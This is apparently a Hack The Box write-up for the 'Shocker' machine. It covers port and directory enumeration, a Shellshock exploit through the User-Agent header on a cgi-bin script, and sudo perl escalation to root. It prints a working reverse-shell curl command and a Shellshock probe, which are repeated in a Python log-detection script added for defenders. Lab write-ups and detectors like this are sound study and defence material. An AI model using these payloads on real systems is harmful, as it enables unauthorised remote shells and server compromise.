Hack The Box: Shocker


Enumeration

nmap reveals two open ports: 80 and 2222.

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The full port scan didn’t reveal any further open ports. Port 80 shows a kind of cute website:

[image: box shocker]

Next, I tried a number of things, including user enumeration against the SSH version (which threw a lot of false positives) and Optionsbleed against Apache. In the end, I checked the Hack The Box forum for hints and learned about the Shellshock vulnerability, which affects bash scripts served from the cgi-bin folder of Apache web servers.

So I scanned specifically for the .sh file extension in <ip>/cgi-bin/ and got a hit for user.sh:

===============================================================
[+] Url:                     http://10.129.215.237/cgi-bin/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              sh
[+] Timeout:                 10s
===============================================================
2022/11/10 14:08:23 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 306]
/.htpasswd            (Status: 403) [Size: 306]
/.htpasswd.sh         (Status: 403) [Size: 309]
/.htaccess.sh         (Status: 403) [Size: 309]
/user.sh              (Status: 200) [Size: 118]

We can even download the output of the script:

Content-Type: text/plain

Just an uptime test script

 14:53:56 up  3:49,  0 users,  load average: 0.10, 0.03, 0.01

Next, I tried the PoC from this blog post, and it worked:

$ curl -H "User-agent: () { :;}; echo; echo vulnerable" http://10.129.215.237/cgi-bin/user.sh
vulnerable
...

which shows that we can inject arbitrary commands through the User-Agent header, for example a reverse shell.

$ curl -H  "User-agent: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.31/443 0>&1"  http://10.129.215.237/cgi-bin/user.sh

And with this, we get access as user shelly:

listening on [any] 443 ...
connect to [10.10.14.31] from (UNKNOWN) [10.129.215.237] 55684
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ id
id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
shelly@Shocker:/usr/lib/cgi-bin$ 
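From the defender's side, requests like the two above are easy to spot in the Apache access log, because the combined log format records the User-Agent and Referer headers, which is exactly where the Shellshock function definition lands. The following script is an added example and not part of the original writeup; the log lines are constructed, and the parsing regex assumes logged header values contain no escaped quotes.

```python
import re

# Apache "combined" log format; User-Agent and Referer are the only request
# headers it records, so that is where Shellshock probes show up. Assumption:
# logged values contain no escaped quotes (Apache writes them as \").
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# The trigger is an exported-function definition at the start of the value:
# "() {", optionally with whitespace between the tokens.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

def find_shellshock_requests(lines):
    """One dict per request whose User-Agent or Referer carries a Shellshock
    function definition; lines that do not parse are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue
        for field in ("ua", "referer"):
            value = m.group(field)
            if SHELLSHOCK_RE.search(value):
                # Whatever follows the function body "{ ... }" is the command
                # bash would execute when it imports the variable.
                command = value.split("}", 1)[1].strip(" ;") if "}" in value else ""
                hits.append({"ip": m.group("ip"), "path": m.group("path"),
                             "status": m.group("status"), "field": field,
                             "command": command})
                break
    return hits

# Constructed sample log lines (not from the box): a benign request, the two
# User-Agent payloads from this writeup, a Referer-based probe and a garbled line.
SAMPLE_LOG = [
    '10.10.14.31 - - [10/Nov/2022:14:53:56 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.85.0"',
    '10.10.14.31 - - [10/Nov/2022:14:55:02 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 11 "-" "() { :;}; echo; echo vulnerable"',
    '10.10.14.31 - - [10/Nov/2022:14:56:40 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 500 - "-" "() { :;}; /bin/bash -i >& /dev/tcp/10.10.14.31/443 0>&1"',
    '10.10.14.99 - - [10/Nov/2022:15:01:13 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "() { :; }; echo; echo probe" "Mozilla/5.0"',
    'this line is not in combined log format',
]

if __name__ == "__main__":
    for h in find_shellshock_requests(SAMPLE_LOG):
        print(f"{h['ip']} -> {h['path']} [{h['status']}] via {h['field']}: {h['command']}")
```

Feeding the real access log through `find_shellshock_requests` flags the probe, the reverse-shell request and the Referer variant, while the benign curl request and the unparseable line are ignored.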

The privilege escalation is super easy: the user has sudo permissions on the perl binary, and with the help of GTFOBins we escalate to root and are done.